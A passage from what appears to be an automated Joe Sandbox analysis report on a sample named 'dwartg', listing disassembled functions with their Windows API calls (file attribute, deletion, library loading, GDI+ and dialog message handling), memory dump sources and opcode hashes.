                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                              • Instruction ID: cba96f5776b4c33538940a56fe0a7accbad1e3d2c4d9cc82b31a9c2d31e0c5fe
                                                                                              • Opcode Fuzzy Hash: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                              • Instruction Fuzzy Hash: 44F03031240319BBDF025F61EC45FDA376DAB04385F448451B949D51A0DB75DA94DA50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641,000000FF), ref: 0072A1F1
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641), ref: 0072A21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                              • Instruction ID: 79aaabc7f9f9e2ce148925b8ea89e277b2d254c419d97f9ebd9abcb2c3301f4f
                                                                                              • Opcode Fuzzy Hash: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                              • Instruction Fuzzy Hash: E3E09271140319BBEB015F60EC45FE9379CBB083C2F488021B948D20A0EB6ADE84DA64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00752641,000000FF), ref: 0073ACB0
                                                                                              • OleUninitialize.OLE32(?,?,?,?,00752641,000000FF), ref: 0073ACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: eb2b9a54fc29aa3b98b1fd11e3744021618468e749974aef49012dd9c0516a77
                                                                                              • Instruction ID: 9034b1d9ab03e654113798994393d5fdc73ed9380af6dd4dabee27f42cd21f46
                                                                                              • Opcode Fuzzy Hash: eb2b9a54fc29aa3b98b1fd11e3744021618468e749974aef49012dd9c0516a77
                                                                                              • Instruction Fuzzy Hash: 16E06572544A50EFC7019F5DDC46B45FBA8FB48F61F104365F416D3BA1CB786801CA94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A254
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 601ed5c7c0d26c8c25ca94987f67d76d46da0b16703cd388c6548fd323f8274d
                                                                                              • Instruction ID: 5ae3e1a2b0fb63d4201c8e6269cadd76eb00de1bedcd54b7dc5bbef19a03d272
                                                                                              • Opcode Fuzzy Hash: 601ed5c7c0d26c8c25ca94987f67d76d46da0b16703cd388c6548fd323f8274d
                                                                                              • Instruction Fuzzy Hash: 3EE09271500224ABCB10AB64DC09BD97798AB083E2F048261FD48E31E0D778DE44CAA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0073DEEC
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0073DF03
                                                                                                • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                                • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                                • Part of subcall function 0073B568: IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
                                                                                                • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                                • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 5d23a27a2beb18cda777c4115fc134e3ec6e8877686bcce1213a946570073134
                                                                                              • Instruction ID: e9d2e10288ea8dccf6c52e76392594baebec2e8de8f0c5d20bee98c4a891d019
                                                                                              • Opcode Fuzzy Hash: 5d23a27a2beb18cda777c4115fc134e3ec6e8877686bcce1213a946570073134
                                                                                              • Instruction Fuzzy Hash: F0E09BB140035866EF11AB65DC0EF9E3B6C5B05785F044551B601DA0E3D97CD6508766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: 6ca5108a91eea07a47f6ee6ef45d7a28f66b1f743378966ae3b7211152f36c85
                                                                                              • Instruction ID: 562adc55722b91d9543348f7443dad170f70e5512cd24207f1d78248e56db58e
                                                                                              • Opcode Fuzzy Hash: 6ca5108a91eea07a47f6ee6ef45d7a28f66b1f743378966ae3b7211152f36c85
                                                                                              • Instruction Fuzzy Hash: F9E048B6500228ABDB11A795DC09FDA77ACEF093D2F044065B649D2055DABCDA84CBF4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0073A3E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 2eb21c46ee51cfbce03a22da80308ab781c0abaa722f3c536278f6a3588dbffd
                                                                                              • Instruction ID: 79b2f97575f0c769d339684886a3dc9e9dbe802d70e90130bb9bc2ad6ee4fed9
                                                                                              • Opcode Fuzzy Hash: 2eb21c46ee51cfbce03a22da80308ab781c0abaa722f3c536278f6a3588dbffd
                                                                                              • Instruction Fuzzy Hash: 8CE0EDB2900218EBDB10DF55C545B9DBBE8EB14365F10845AA88693242E3B8AE44DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00742B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00742BAA
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00742BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 07dc4bd2ea21ae8b26f7764305f406a54f10f3b91b4a8a46ca0b2e8084df71ae
                                                                                              • Instruction ID: 0097eedb81c52abda02b9db1d8669125511a8d37facbb348df11c2f0539a3149
                                                                                              • Opcode Fuzzy Hash: 07dc4bd2ea21ae8b26f7764305f406a54f10f3b91b4a8a46ca0b2e8084df71ae
                                                                                              • Instruction Fuzzy Hash: F9D0A7F4694300944C542E70390A4642745DD417757E04696F430858C3FB5C8053D119
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 007212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 4f4ee27aa5e4233efba1266e91e945473e5286fed5ea5ad50ba186147f2b7bd9
                                                                                              • Instruction ID: b8ea51faebf2f2b7fbe60df07771f5797faff18ec391fdef41ea2cf9635917d1
                                                                                              • Opcode Fuzzy Hash: 4f4ee27aa5e4233efba1266e91e945473e5286fed5ea5ad50ba186147f2b7bd9
                                                                                              • Instruction Fuzzy Hash: 6DC0123289C608BECB010BB8DC0DC2BBBA8ABA5B12F24C908B0A5C0060E23CC110DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00721A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 60e38544c5140dd777f2505f46e724a76a63bcd075357ac0f8b82f1780d3adbe
                                                                                              • Instruction ID: ce392b411794af8b110d702af50047a509c27ac7f920e5364557dbd5c677b070
                                                                                              • Opcode Fuzzy Hash: 60e38544c5140dd777f2505f46e724a76a63bcd075357ac0f8b82f1780d3adbe
                                                                                              • Instruction Fuzzy Hash: FBC1E370A00264DFEF15CF28D498BA97BB5BF29310F4841B9EC459B396DB389944CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00723BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 50fd62d638450a44173809733a4baa6e25f312f0e1f8916ff8e52a1ccf23a18a
                                                                                              • Instruction ID: 94a8a1a4b0e010a29eac262d803d30d48e2c15b3a27b23a6005c33ba78357b54
                                                                                              • Opcode Fuzzy Hash: 50fd62d638450a44173809733a4baa6e25f312f0e1f8916ff8e52a1ccf23a18a
                                                                                              • Instruction Fuzzy Hash: ED71F571500B94DEDB35DB70D8499E7B7E9AF14300F41092EF2AB87242DA3E6A88CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00728284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00728289
                                                                                                • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
                                                                                                • Part of subcall function 0072A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
                                                                                              • Instruction ID: ca0473e300d949835e80a01aafb6c13adbe4f5e2ec7d96ab6497bb3ca089f195
                                                                                              • Opcode Fuzzy Hash: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
                                                                                              • Instruction Fuzzy Hash: DB41B871945668DADB20EB60DC59AEEB3B8BF10304F4404EBE14A57083EB795FC5CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 007213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 007213E1
                                                                                                • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                                • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
                                                                                                • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
                                                                                              • Instruction ID: 979f42b91b62af22fc69bfa6a0b135a87016bd7abcb1f0a40a14d3b91579e321
                                                                                              • Opcode Fuzzy Hash: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
                                                                                              • Instruction Fuzzy Hash: 23415DB0905B40DEE724DF398889AE6FBE5BF28300F50492EE5FE87282C7356654CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 007213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 007213E1
                                                                                                • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                                • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
                                                                                                • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
                                                                                              • Instruction ID: db7f6d9c3f385ac81b0bf5ecb1ccdab9be622274af07af1fa3ea6ddeec1f48b2
                                                                                              • Opcode Fuzzy Hash: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
                                                                                              • Instruction Fuzzy Hash: E8413AB0905B40DEE724DF798889AE6FBE5BF29300F50492ED5FE87282CB756654CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0073B098
                                                                                                • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
